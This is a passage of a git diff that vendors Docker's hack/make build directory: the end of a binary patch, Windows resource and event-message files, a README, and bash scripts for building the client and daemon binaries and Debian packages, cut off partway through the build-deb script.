zqoFUZ->+DM-K$!UCDU&jy=d?*FTEK`;<3nZ;>=%q*70W?f7bLN+m`HuOwh5l<}w9%
zk)Cyl)&?xjzoZ0&U_MR-nMQVSaRsu&{S1XoB)f;~-(>$I(8a&%EkD_W{QO1MLc^QW
z_gJa>H(15gJ2Xq^0zD*8(Ru~mMd^6M2Til9Jz4Nzp#J~7QWYGZhy!Be-E+!2mvutQ
zCkUv>DsR($ZZaV5fTYYvL9Mv#s&!Zv2`}fCSGtmU|4zEfXH==_;ioxwm_*|wlR0L#
zkmb3h2WM`%$5>AJ>MXZ>HL{Ph+_H~}_GN@m-Bw=yk7>^yW&y-YPHSPDVe;tjDY-%o
zmKjj)TBYNAM#;4KhbW!1^o+1Wr3&Yio^MKWsZX{s*$A?&$krw6Xv1H=-=w@>v^Qc&
z2nc~~Km{F5Hkz!fMgemvE#6<kU;TJj*EO=d`N!?uw6ax8oom|Tr+h_0cI3HPOhGrV
zf~E^9=vc+Oqp0geO?}q<SCf*YyG~&RG5ORS&!so19C{$+m8nb*g(}qDRo*oZ1`-1W
zi6{SKS0t0=zueNpQc2e3VqrlI@PTLkHl9OW8U+v0Dh?kvk*6o?rWq@5l5o=66+R7@
zk8z03a8V&a<)X^R+VTP`=(<XE$9|=04u?H2#g>(pciZXi8S2VY-nmLI8N`gHY74y9
zCzW!4mh2_H<qu@uy~P(GrIF>=`7t-VS!Zb45j4hUb8ySwRCw3a6J%?Xb=C8YzZ@?i
z`xyzzVfwYnh*m&IG<e7Cvt(Z&+tQ}eAyA0~_=7Ufzbwo54WtKT0L%CCXId{Gmaq0M
z)TN`F25LNeEI*f~j%L#vGTn#tmdv}IxaHGF`Gb-FVaqf4@qOK|wFAB-W?TRdyo)Q(
zw-n2#hbA94$oHdT8jRNx7cKE(G&9c7{UghvmL<)a<K0la4_?QCizxNY%gORzx7c!p
z%Fd^h>+T(z$;4k&I1}#1?-|{FLt{=_dePGI$s=<9lC3wy#d!KL=OO33_%FYI_<ck(
z>=g9!B}!p6ltcQzd#MQDkmVDMteRCODghzUXh?;4T5ow1&hq)L<QWD8KmY_lz-9vZ
z6q1X{2C^GTOn5h)StF=`kYLoK+(nXYLzWMWS0f7p0w4eaARs&e-gUp7>@Ko9NKlTO
zX33=j649d{UslfthFa@?c^@DQ2!H?xfPnZ3+@dV*Buk5sbfR)-&$^X%O(GC<A)(;B
z=l;HcrKSwEB_E0aU+SQ9{@|l6c|#Zw5E}t)W;V;uD7;;ZOY%q)2v|Vivus$46)s6n
zVu{$>0`cr8pj^Ji*80}w@JU`UAOHep3D9ct{L~C##Dizd+h;Gt!)y)Nb<t=_g<bJT
zGq7C#GvjY4bdy_aw7E2MiP5YS7!Uw~A_-`7^H_db!ECl7JviG@siHagif+zM#*^ds
z>=ww-=9x^T;&Z*NHrkv#n}o;egb)A(BuGG;MO{`Yv{Q)j2BNMmhmX%lHX`D#tCRJl
z^gLTYcugynd?Ard2HjXTVM8FP6G+fbHD3fnzg4;bgC52?^Y#6k4G;gq*a^puCjb>u
zD7V{+Rhx~$5L?+Hocj^r{Z@I&X-x39E0rpXX}mhRA7Sy82m+!|EU~p(bblx|45HYY
z9>RfuSPAfHRt5c5)(<K=v`l<p)7vMS#Wua?(0CD9kpw(@F0TQ}N87SlZjMbG*~opo
zm`r0+P($kY1p(<2pn(oPTFzS^qA<RGKeLgM-9?cX31k9uc^y$nYE|){tSKRWK4J(1
z0-i`fo0UUdR_Wpq4~>TQ%2xIC#JUiw%;>`6<Q2*_wpM^PFP~}Y8=Np8;4uUq43yJ6
zU9oiGDirzDb=95?ZO%7^f^iW62nYwQRDG&j6k;QEZ6@Dd83qL0p8%gYl6PMO1LdZu
zef<(hJWAX_&@>p%?IVCO5CgwC+i$Y0EStYht_Y-WXv%2-4+aF>kpORXq|;c37-t^(
z`0in&TH(79Hr#g@1F->GkwH}IUy5|M&@mrlAr_K?H>nZevki6AbHykg8ch;YtJ_MA
zsk`JCU08;iRH<gz)s001ilXTcHk1j!AYcyx-s(uB&8%ocE0!<t^xUG#p-|*9FYj>b
zy24DBqWHML4FY0-9M|k5y~$YhNiRcC-7o)RqisiFK)@XcXtQaC6(8#mW2=J$=IcFt
z{bFgi#FOs8TdHM%fEd@DT5Z?9&wN^=DBskK%ZOtTFh_u|>)>1H@|_UHGQ+B<{QCMW
zrL9Vq7Ig`3t|Nd!bYs?E{8f(KyL*#%fwOruT&7krxv!UTtR8pF;XPT}o7MK$Fn_gz
zC1>Zc6ZbRONwP5FC7}Co2X94-SvWX8AKK??RI8@qB`KYp**l010Wq!XPj?<=8R_*+
zovk^S(-)^?9{9y6Idv=as$Pl>t5=>?^nP@8{)N<RHvhky?AOcpnFxE-t*K(S^2=9|
zYxxW-TGJ$Yqw%`VyuGVq+`}<71p#pk$A_^j*!vv2fB(CO4%Q#ZlnN&I_pv^pghTkL
z6l`{jYOF~)`dp*lB;UW!l9Q8JU|=Bg4+t<gvn^MW*_;1dVVP2RU_HpS8y@g+JKDoa
z*Yzre;;B>_%*Q8)4GX_1h3rZpj}Q=N)Y9zj$t*j|-=3&FX^$)gwLBKJ3Sy1Q7KrA)
zJ$u>4pEt1U*RJUhDwRq$>5VC@dQkNTNVi>0W)uIogqFwyBCb8)qM`fFtk}D&3|JJ3
zJQ_3)r*V(J3{Lp9pMbprf<g46>OiCUvM6V3+;o4OVx0PDO(87w`+V&(55(h}B}>_t
zi@tau9z2RR?b;O*5AN2!N&xFxEs!6=xR8MEQ-SogC%!09^kW?cE^@h+`T4&9@h|`p
z&o2a|sJc)nCe!yY?c3mrcMs4UdUrQ!T74f=r(gm9j_rwT*N&Z!6uE4<vX8iNhY?R!
zDAFB{P9Q)pGkj(h-*R0vJLg(bOg>%L&wm0<*Ij0bcldEF0SHJ@y!rQTy?uTv>XJ2X
zy1_{|UmMc2ye|u+nO3|hykY&%MdIOITDkNgd4oB6<X_!kHD5KW8|c|H)(lLX`O9Zl
z6|5we;GS)M{<Em%@v$@cAa2_UKtPIPr&JE3R*2oxQgnlqV)<4=ab>l`-5>y$FI}P;
z(07ZB>B9N*?7itT*oJlMb=_N^d_0@+0d{VlEahEf7&zKbz_9V5q{cdoi|yzC6@A!z
zvau76#YI3VuIz{?H$$5zvAMf9u+&t$KTgBD4io`2z|5QDZf4483T~m~`^jcYcIo0p
z#;w8JCjkkd*;%Ei^#bEq0=kwjpIs&87Z+dOpV=!dhd7oDVskVBw{L+YXs6oAOsN`d
z_kak`f_{mwow*TZ@O!jUkQ-mWhjVx>$*8X{ZDC9%CC9$;CQH)t7(X;OTDO#3YJ(l7
z73Ax;m5pp=_uHFkv^aM>0k>BXyO8mwh_}yTyW-FX=C6dh=`W6mOhj><OUcsZrrP6=
z(>#647QmD*U!IjITSgb|RB}Oh5fw>#S<!!6RyWu|+viH!`1$Xk@6vXZbQwG-^AM1d
zDqE=>N#DwJ$VMD|0zMzrbSJa-W~y#gphBTw9lLb4sAyfEd0OZ1PF61a_inmHVc@9<
z0(^Q^dX|3YLkW(On-<B}Zx8idwJ~+Zxp)acKuW5cq0RZe(bG%vX6bd^$U5J7(M?Qx
zZa(|=^c`Jkx^{b-HE0-Ywq)TgBUsB;t#p3AIB^RbP@1Jx%tie&a$SqVT|P#m>$Zw)
zSxkxHEK&m45X;hvnUi>(Wo1^h)O$((_^yk5_eFOwK1w<Ju1!r=gLY8Nr|uL!r+3Sy
z%`7wH;bIs+KR@<#_h(r9jvZ)1fs7rzlg?sypJ%xqvf|Pq^~{BXTClqPN9fpXjGzBH
zYI*c@oAOAgAoeathk#gG*$eiypb4mZ9l3<pokWE1pg6x}b)ATCq<rxQpTnDyl0q9|
zmC`Lom&*$pyhrY4urYftvb)rU1!DmL-c>~{4Yv~xUUWWR7gMe*xCxx&1p?w6u0_ZC
z`R=tWEwx9{7j1KOClTQ-k=VNB+4Hr^GL7QVdCO_k-SySU+wAL8w^=q?9wpx}d~lq%
zIOq#cZntw7pV#i|_aTYLt0jYg4`&g8fH;e6QSr{-t6>=#Nh~MZvgt-e#ZiQt+*`wB
zUg{#Qh`@=uN)$3hhFq!MDpx39q88X=IoTP1(xa`|Wq`gUBrPlYv)Ta~7C?(VcuRwS
z5M<BIG?s;JcuTBQzPCD`Y@rj55`9b11K;4v*KaJX6#PVjxp%89LqJ?zo%8qhVJXS0
z9NCq{iy+g`*Qk6%u(t<wt<$?<zCy0NEmNwN%jJr3=`V#8>TB}(`j9d^BPB;mn_<B?
zj)0b?;Ob`TNqs7=IV60eIY0k?w87OHbKY>xH3T3auHjrbmASirqGjs63Om|=ru&$P
zAHCSSa@jg{CCO#-TxwlhlgpLcWD1>N+$*UxszrM<sTHCr$sewlOn|pEbS(~dZ=Lav
zdieUap)W%HSuz#)a0LN-1qAz<*iuVMRbQsj++<l<Mej9hOPmyjFE-3ePG@pInxRGO
zDja6`gdOUNqS;URa+xBX2D2|Sg>pLy$K3RnL;tmQEjVw1WM!miNO>HVMURWfod?E?
zs!WaMI#X-HNIb3=bs28bB!F31w$|H%ePJ}M_h))Ady%F2t6CM)<|}9(tDMg5ezKN0
zE~1;oN&ggdIdOHML}j@$nLJY_m*1n~n@lc0M8|6~UJfgIuUs3-?!EM2hup064f!&y
zNC$0fD3l9>=r*h3Gpe!+^$NN$2LdGJ<GYXkE?TiMtv#sF0&un=Nqbu$5D*)nTNGr$
zzAE%k*N~W0CI9@l9R2!}E!YH#N5X}Nu~Pid$YfGD-F~$im9inV78F{U>>l-MU1eHX
zGPNR(()BYmE^);uj8hN2mmY}C&&f{6%ge2zmGdDI7^?_S>yLL+<?{uk?%qvh42E~b
z`uWeJ!SYv(opCH40uT`K)P>vRq|-0QpA8LE{$FSruPU_yz2qMrxz1K!DA<GDZ3^jv
zf)uniXnccD!}T<yP~_5hM+|+?<7-bVx|GTb0g+N|i7>A(Y&}-SPo<hy!%x|<c7QtY
zF+YvmM^$)e?0Q-j>$3T@2y-vOEb+A)e9tr9MMcLRX*8N!wEa&6&9uTzBk~)-UI8im
zq!4*wkv-c9Y(IbXi5)jHMyX`7j+K0r)hl_cyvup3WZoneCG|;F^3|}&ioR_3jWpXc
z;Lag+T~ss$m(Qk>@`pGaQAfVMTbN4Sg$Bz#R6QL5Q95y83`9D0^+-<txO|<z0Mx#k
znHPL9H77Dp%R*IhS&)xXR*Jqg>s?x{RQjtGGL2F}6Q)X%iASO@<Zv-LgZ0>Uwvd}g
zpK#HjZ<**s!=2Y{SX#;a6P~_)6R68-wxvPfPj~|Mwm={t4ywc7PMr(P%+vlxkLfVJ
zO-DwaR!gg{^K)q%ql{c_9=Y-1(_Ff)n?FU{deH1yS-y-$(&^!@n@LNLBsrgL%d^C%
zRe961pC3`HK~9UimEN?vPbFt^H3bONC}rjSePtT8>n1~u+k2jEzwW`U5S?i7mIhh=
zp?6(PI_L(Hax@yR8_dhA4Ru)^mvS*YG4Bu%5!E`0h|i6Ty!{ou6?I*eE&d%2UoS7_
z3L&{k-=65S$-}y}4c$|Gl{i`&g>P%#s`d5zmiDuHvG4_)NriyD0)p>>IIyPMJy9c_
z#G}!rwA@n;jMi*ad3kv(IW3Ldp%0CxXJ%4+#(A&B6?`;oKn>Gb$7Zu9$%|TI%2$Tx
z)2Ctc?xpI!Bnj~_sY;bPmH7vBf_Rv4@vu{LVL73~sU@O5m7H_ri2zj{Cq!>HO8%`4
zwMxajsB4S=I@+YuTX@vQlkW8$4@1`!AJgEi3@3`PqwB*sz69-5<5MRd^QMQ7?^gO$
zXLlMccgW{DotRrhT>=4n-#VcpB>=YdGAW7TU{coKp=C6ow#H#^IQ|h14Jirl<5DRd
zH|uWG#UwWApKJDJPq^@0HE7C|ZrT)A4r+G5SU^CnPGR0Y18KlxqXoX<MFIpMAR@1%
zcYZ&%C8C0N2cfgcn<rdMc+-T7iQx-Rw&aW7bOX1aVJGfq*%I9KVQ5i?K`?Zp;Ymxv
z9YLG+%Ar=rDr$8MqE-jB(_q|%00cw=HTn9^qu+O^<THr3{>5Sx)H+e=#Y9D;@q9$y
z8gqkI7<S$)!clb+2i-?Cc&maR^Tinw?U%BqKAh&)%j+7`c=e`M#~)5h0}%^G00JTy
zdg~G%x%J4~U90-M$v@pEM#EbuN)i!+<$}VkxkV(a&fI3x58n``IJ{NCTM~v}y>LJ*
z98?`jWe)T4na+ksOm|R>h(?42ARr>Fl;W~9WYghZ9V>gUuIQ~4QCp<A+!nYSgoU?Q
zc()g~hGXs{X4iRk=&pmuQhAGk7Sw3@ejpEyx!Xh0FrRB&wV8l!klbf8Q>yrvpHgg&
z2LUBP00JV3YI>N-*iDD(gqGGEu3uWix8s$(IdLzOjoEdX(W*(^_Y7$fWWiUl%=Xuj
zXYQYigT8x7cO&b?Lh?|gS^#gKGfb`K!f{ZlML@o-BLD%hj+ZEWPfa|m&SLTtovQi<
zi6TRGW@7Exdu+}jfx5En%sYY;0gWb!c0e3S!m$iIJc|GXM8fqQv-$9%-qn0##X2rx
z4chnrxz2vQh<)F!VJ5g=l`5Tt<8AtA$1K6~f(!^k00JTicE=?ev-wEJ@N(*nHT~6&
zTd3i<>{%RBE{$1C{QVL;d^^M9Fz_f40hKC?gkuiPl6W0k=L%E@B1skkB9e-*CmSE_
zJ?eEmOM9eq72n!shYsvX#06oKv-8-f9T(Z<)NB`|h9s;epd{h&_FBjk%JEpwVKqIs
z3;+RfqiTJ5)8WaTD|x?5AMKFLEG<*~H`8<2=$#kYtqiO;Gi4*#xk{bJyfmNDEVeh;
z$W~Z(FIYv0FJTCX`0B*29L?HutV~uu+aFocySiNw2^jc7N;Vs}>ms|Cg=dw3)xZbG
z@6sZ`59mW3?+Ka@BraM45D?K;jeQv#y7kDIh_afG9`{pOw?y2&WE~dzTyhqhu=^53
z#9>4&jEMJvdU>6uPXoS5!hu;;7Gm>MZx9eSuKBO_pHTmolDoNWMeo)ch4gy0AR;cj
zIr(P+y}WkN0>Du;9ru_EQ$|t}CIA7EaOGK=^_lyQH<UB&uT9E&Rkk#YSp4w;^+|g!
zvukNNV#$(w<%4%qsWo5IjH>_9z<8>A6%M6wHUS8Tvk8kR{xQG(`&_*M)xvs#YF`m$
ztHi9_&B|qy_grD8Xw^E50|@ZehQ@0jZL9nS8y24EfEW>lhZ2B*cwoi9z30DiK|acN
zAM;guNu~H1x%q6y-`CilYj{bvsm}P=hQ{kMZK1q`wttyHp96#%+XNDUj0r$MjA?k#
zF@3N~w*5xtq-x&sw`vEdy`@lezWvo#$8NLlPTbLLg(ZbN3!X=f<_-;rucj`lX*9NR
zMezI}18zkC0^(NHX<K1t>^&Y`PA&gG`i^dC+hTBSs9jf6*!%mhv$P!AZ5O660p8M3
ztM8I%Y@%(CXHXZ_zlA;E3<MlU00QDTmXeQY$)Qu>*VFU92ri|n?=8~rju;^GLG|f>
zU1i4|y%oG60V)0JL_>3px~G0-O64pX3_l~K>?5zzB_LG+NzhJ}E_6xcocg!|cHheU
zxQ4ItxvD<m9W3FSXnpnHZT91-B>oK$&ocb0O=|UVntQu~_QC&z`lzrSrDxp%qA0CY
zRYVl<JRuWbA37a%DJ|#2x&f-jWi$#=eiQLnQU;qzTl%{7Mp|;YmIUJ}ZAP_|`lr62
z&;9-83HKk$C~g7}5OLR!XmUrb68ZkS*?sczwNpt<>IbOk`+_1eS$SIa<*{3A^_hDt
zPyeMU5oOQ%tjOj0G?;ON`lbFPyPWI_7SjYPVyq{L5Kbfj0dXQ+ca55h$*Gjwc9+s~
z{#VUg(X6(=+MD;qi@}_|pT%a=7pnffBeA{VRjN$tjyg|Mrhcc7|NcmOiEI%APvijv
z%n^Wqn4^Ph77-vpDZBetR=iTC9az;{5%id^N+q<O@Gn#?K6;zo$rRbvzFcXQN)ij@
zCF+hkKw`m#Vhst#ZHr*T69|Zi00cxtmEkT~`SIT~Wq!Yv`HHVX)~kxQyl!=0m9L*l
z?s84Z%*$uXPu<lGvh&r5E;U>z6v`~7RNSIg#c3v2kXXoeFc}HP(B|nb%?lC(0VffF
zfH(;(qAg6||NcBt>&U(AI6sA~bvcc^R%LHRDVpJ>a>X}!lc*K)_3=Aw<AwW-&)jmD
z;roIp6q(eDxJ&j5*;8Z>l1ThP?tik_rdbY43lV{U2nj$yL|7@Fl%;Wr$Eu!7&FSZ(
zkTvsD%IXBFWR**)<bi=IxtFg>rtnuOWHeyUln!XX+@vp6@ulp)6elFS)xZa@WwKoQ
z%_1R4qu={<P68pLrQEVhbbN~J5pq9(9SA+?PDNRZA^-s?iVECBM<9IFfqEn|!M;k_
z6Eyv+T28(;&|fLn<mBi3QY*%b-1y@^fIfku`v^*Au9gpeq|0TpyzG2!erBFFm$WEd
z&ScrAQ*%%JeJAq*g}6_fL)|7Z;Io~s(=4YuqANHu1Og%^;8Fn*F$ZJ~1V8`;K)}TW
zM70*c#brlwAOHd&00MRpfPmNm4?#fy1VF%(2|z$Rx%N?Z5C8!Xu!8^u#141}3IZSi
z0-j6&0^-TFkFtXR2!Mbc1Rx-Gz(Y_F009v2WC9QnPp*BG9RxrC1neLH0kH!ff`R}D
zfPg0xfPi>%?W61<00JOj2LT9(9q<qo1V8`;JedFl#FJ|uWp@RE1npE;B!e_SKp+B8
z5rM!XSr7mL5Rf_n2#C~c5cvlI5C8#z2tYst0*_=t00cll>I5JlQm;Ye9|S-E1Oy@g
z0TBp1k_7<}00F5JfPhH729bXd009sXhyVmcAn-^Q1V8`;q)q?=BJ~<X{y_i)KtLb@
z5D<aDBUumt0T7Tn0SJiHYY_Pd0T2KIfe1iA1Oks_K>!3mK<We_AX2YE<R1h;00aag
z009vQJdy<g5C8$G6M%q7y#|qg5C8!X5QqQ-L?G};76d>51f)&?0wVPqME*el1VBI_
z0uT^^z#~}@009t?IspiX)N2s=2LTWO0f7iWKm-DhWI+G~KtSpQARtn&LF69<KmY^;
zB48pQ3EHUwWdzBB00@8p2uP5CiHb<D1jsT7fB*=9fFJ}QAc9~=q96bQARv7L5D@9t
zAxZ!OAOHe_5P*OPf*py100@A9^a(&fq+f?90SJHq2na#|0wM@@Bnko`00Pn{00EJH
z9ijvv00JN&2muI)AlQ*82!H?xNS^=%MEZ4z5`X{*fPf$bARvNZN1`AA0w5rL0uT`C
z*C9#(0w4eaf)Id!2!b7nf&d7Bfb<DKK%`%XC;<q700;;|00JTib|eY{AOHf=CjbGF
zejTC&AOHd&AP4~nh#=UJC<uT62uPm*1Vs9Eh!TJR2!Mbf1Rx-SU`L`L00JN&eF6{=
z>DM7j00JNY0)h~LfCz#ei3(33K|59WOdtm!AbkQ*5$V?<N&o^N00M##fPe^s9f^Vf
z2!Md}2|z%kUxz3G2!H?x2toh?A_#UQ3IZSi0@5b{0g-+kq68oS0w5p=0SJg7*pVm*
zfB*<cp8y0z`gMpBfB*=9fFJ}QAc9~=q96bQARv7L5D@9tAxZ!OAOHe_5P*OPf*py1
z00@A9^a(&fq+f?90SJHq2na#|0wM@@Bnko`00Pn{00EJH9ijvv00JN&2muI)AlQ*8
z2!H?xNS^=%MEZ4z5`X{*fPf$bARvNZN1`AA0w5rL0uT`C*C9#(0w4eaf)Id!2!b7n
zf&d7Bfb<DKK%`%XC;<q700;;|00JTib|eY{AOHfcB9Ne+>dd5|BF?0XxIq8}K){U&
zKtSBMa#1u8009tiCIJYDGwC935C8!XaAN`x5I3$|6b%GG00f*#00QDnx`-PDKmY{X
zm;eOCjVl*L0|5{K0cR3`fH;#b;syZ_00B2900D91%0<yY00cn5nFJsp&ZLXDK>!3m
zz>Nt&K-{=;Q8W+$0T6H|0SJgQ=^}0r009tiV*(HmH?CY14Fo^{1e{3#0^&@%h#Lez
z00i8a00hL1D;Grr0T2KIXA*#bIFl~o1_2NN0XHT90deEXMbSV21VF%<1Rx;Jq>H#g
z00cn5jR`<N+_-X4G!Os*5O5{|2#7Q3B5n`>0T6Iw0uT^4u3Qui1V8`;oJjxz;!L`T
z+j;^C+NstDLI@B50l^4BMFc~Sgh2oVKtS3AARyANKja<+KmY^;BLD#r3_TJC0T2KI
zX%m2eNW1=!dk_Et5D<(21Vk|ONEie_00g8>00JWI`a|wP00cllFai(|!O$aN5C8!X
zkTwAbh_veuxd#Cd00F@WKtKdTkAy)01VBLA1Rx;Nu0P}+1V8`;1S0?e5ez*N1_2NN
z0cjI}fJnRkkb4jS0T2+300cxZ^hg*4KmY`!O#lKS?fOIRK>!3mKrjLj5W&zRVGsZT
z5Rf(j2#B=n54i^c5C8$e2tYstLyv?(00cll+5{jV(yl+`9t1!D1Oy`h0TB#65(WVf
z00C(efPhH5{*ZeR00D^-nB6gcvqZCAINMN>!aQ&W0w4eaAYdT@2#AHC;0**o00cmw
zFaZciVIDXG0T2KI5U`K{1jIs6@CE`P00JOTm;eN%Fb|x800@8p2v|q}0%9R3cmn|t
z009svOaKB>m<P^400ck)1S})~0kIGiynz4+fB*;-CIA5`%mZg200JNY0u~a0fLI6$
z-ar5ZKmY^^6M%pe=7BR1009sH0SgJp7}IJ$=+<odSD!chhKK3eu}6p1?FPU7{{_3K
AApigX

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.rc b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.rc
new file mode 100644
index 0000000000..40c645ad1d
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.rc
@@ -0,0 +1,3 @@
+#define DOCKER_NAME "Docker Client"
+
+#include "common.rc"
diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/dockerd.rc b/vendor/github.com/docker/docker/hack/make/.resources-windows/dockerd.rc
new file mode 100644
index 0000000000..e77fc17519
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/dockerd.rc
@@ -0,0 +1,4 @@
+#define DOCKER_NAME "Docker Engine"
+
+#include "common.rc"
+#include "event_messages.rc"
diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/event_messages.mc b/vendor/github.com/docker/docker/hack/make/.resources-windows/event_messages.mc
new file mode 100644
index 0000000000..980107a44d
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/event_messages.mc
@@ -0,0 +1,39 @@
+MessageId=1
+Language=English
+%1
+.
+
+MessageId=2
+Language=English
+debug: %1
+.
+
+MessageId=3
+Language=English
+panic: %1
+.
+
+MessageId=4
+Language=English
+fatal: %1
+.
+
+MessageId=11
+Language=English
+%1 [%2]
+.
+
+MessageId=12
+Language=English
+debug: %1 [%2]
+.
+
+MessageId=13
+Language=English
+panic: %1 [%2]
+.
+
+MessageId=14
+Language=English
+fatal: %1 [%2]
+.
diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/resources.go b/vendor/github.com/docker/docker/hack/make/.resources-windows/resources.go
new file mode 100644
index 0000000000..b171259f83
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/resources.go
@@ -0,0 +1,18 @@
+/*
+
+Package winresources is used to embed Windows resources into docker.exe.
+These resources are used to provide
+
+    * Version information
+    * An icon
+    * A Windows manifest declaring Windows version support
+
+The resource object files are generated in hack/make/.go-autogen from
+source files in hack/make/.resources-windows. This occurs automatically
+when you run hack/make.sh.
+
+These object files are picked up automatically by go build when this package
+is included.
+
+*/
+package winresources
diff --git a/vendor/github.com/docker/docker/hack/make/README.md b/vendor/github.com/docker/docker/hack/make/README.md
new file mode 100644
index 0000000000..6574b0efe6
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/README.md
@@ -0,0 +1,17 @@
+This directory holds scripts called by `make.sh` in the parent directory.
+
+Each script is named after the bundle it creates.
+They should not be called directly - instead, pass it as argument to make.sh, for example:
+
+```
+./hack/make.sh test
+./hack/make.sh binary ubuntu
+
+# Or to run all bundles:
+./hack/make.sh
+```
+
+To add a bundle:
+
+* Create a shell-compatible file here
+* Add it to $DEFAULT_BUNDLES in make.sh
diff --git a/vendor/github.com/docker/docker/hack/make/binary b/vendor/github.com/docker/docker/hack/make/binary
new file mode 100644
index 0000000000..88b22cd462
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/binary
@@ -0,0 +1,15 @@
+#!/bin/bash
+set -e
+rm -rf "$DEST"
+
+# This script exists as backwards compatibility for CI
+(
+	DEST="${DEST}-client"
+	ABS_DEST="${ABS_DEST}-client"
+	. hack/make/binary-client
+)
+(
+	DEST="${DEST}-daemon"
+	ABS_DEST="${ABS_DEST}-daemon"
+	. hack/make/binary-daemon
+)
diff --git a/vendor/github.com/docker/docker/hack/make/binary-client b/vendor/github.com/docker/docker/hack/make/binary-client
new file mode 100644
index 0000000000..1731fea8b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/binary-client
@@ -0,0 +1,12 @@
+#!/bin/bash
+set -e
+
+[ -z "$KEEPDEST" ] && \
+	rm -rf "$DEST"
+
+(
+	source "${MAKEDIR}/.binary-setup"
+	export BINARY_SHORT_NAME="$DOCKER_CLIENT_BINARY_NAME"
+	export GO_PACKAGE='github.com/docker/docker/cmd/docker'
+	source "${MAKEDIR}/.binary"
+)
diff --git a/vendor/github.com/docker/docker/hack/make/binary-daemon b/vendor/github.com/docker/docker/hack/make/binary-daemon
new file mode 100644
index 0000000000..e255543c16
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/binary-daemon
@@ -0,0 +1,13 @@
+#!/bin/bash
+set -e
+
+[ -z "$KEEPDEST" ] && \
+	rm -rf "$DEST"
+
+(
+	source "${MAKEDIR}/.binary-setup"
+	export BINARY_SHORT_NAME="$DOCKER_DAEMON_BINARY_NAME"
+	export GO_PACKAGE='github.com/docker/docker/cmd/dockerd'
+	source "${MAKEDIR}/.binary"
+	copy_binaries "$DEST" 'hash'
+)
diff --git a/vendor/github.com/docker/docker/hack/make/build-deb b/vendor/github.com/docker/docker/hack/make/build-deb
new file mode 100644
index 0000000000..d3c28591a6
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/build-deb
@@ -0,0 +1,91 @@
+#!/bin/bash
+set -e
+
+# subshell so that we can export PATH and TZ without breaking other things
+(
+	export TZ=UTC # make sure our "date" variables are UTC-based
+	bundle .integration-daemon-start
+	bundle .detect-daemon-osarch
+
+	# TODO consider using frozen images for the dockercore/builder-deb tags
+
+	tilde='~' # ouch Bash 4.2 vs 4.3, you keel me
+	debVersion="${VERSION//-/$tilde}" # using \~ or '~' here works in 4.3, but not 4.2; just ~ causes $HOME to be inserted, hence the $tilde
+	# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better
+	if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
+		gitUnix="$(git log -1 --pretty='%at')"
+		gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')"
+		gitCommit="$(git log -1 --pretty='%h')"
+		gitVersion="git${gitDate}.0.${gitCommit}"
+		# gitVersion is now something like 'git20150128.112847.0.17e840a'
+		debVersion="$debVersion~$gitVersion"
+
+		# $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false
+		# true
+		# $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false
+		# true
+		# $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false
+		# true
+
+		# ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a
+	fi
+
+	debSource="$(awk -F ': ' '$1 == "Source" { print $2; exit }' hack/make/.build-deb/control)"
+	debMaintainer="$(awk -F ': ' '$1 == "Maintainer" { print $2; exit }' hack/make/.build-deb/control)"
+	debDate="$(date --rfc-2822)"
+
+	# if go-md2man is available, pre-generate the man pages
+	make manpages
+
+	builderDir="contrib/builder/deb/${PACKAGE_ARCH}"
+	pkgs=( $(find "${builderDir}/"*/ -type d) )
+	if [ ! -z "$DOCKER_BUILD_PKGS" ]; then
+		pkgs=()
+		for p in $DOCKER_BUILD_PKGS; do
+			pkgs+=( "$builderDir/$p" )
+		done
+	fi
+	for dir in "${pkgs[@]}"; do
+		[ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; }
+		version="$(basename "$dir")"
+		suite="${version##*-}"
+
+		image="dockercore/builder-deb:$version"
+		if ! docker inspect "$image" &> /dev/null; then
+			(
+				# Add the APT_MIRROR args only if the consuming Dockerfile uses it
+				# Otherwise this will cause the build to fail
+				if [ "$(grep 'ARG APT_MIRROR=' $dir/Dockerfile)" ] && [ "$BUILD_APT_MIRROR" ]; then
+					DOCKER_BUILD_ARGS="$DOCKER_BUILD_ARGS $BUILD_APT_MIRROR"
+				fi
+				set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir"
+			)
+		fi
+
+		mkdir -p "$DEST/$version"
+		cat > "$DEST/$version/Dockerfile.build" <<-EOF
+			FROM $image
+			WORKDIR /usr/src/docker
+			COPY . /usr/src/docker
+			ENV DOCKER_GITCOMMIT $GITCOMMIT
+			RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers \
+				&& ln -snf /usr/src/docker /go/src/github.com/docker/docker
+		EOF
+
+		cat >> "$DEST/$version/Dockerfile.build" <<-EOF
+			# Install runc, containerd, proxy and tini
+			RUN ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini
+		EOF
+		cat >> "$DEST/$version/Dockerfile.build" <<-EOF
+			RUN cp -aL hack/make/.build-deb debian
+			RUN { echo '$debSource (${debVersion}-0~${version}) $suite; urgency=low'; echo; echo '  * Version: $VERSION'; echo; echo " -- $debMaintainer  $debDate"; } > debian/changelog && cat >&2 debian/changelog
+			RUN dpkg-buildpackage -uc -us -I.git
+		EOF
+		tempImage="docker-temp/build-deb:$version"
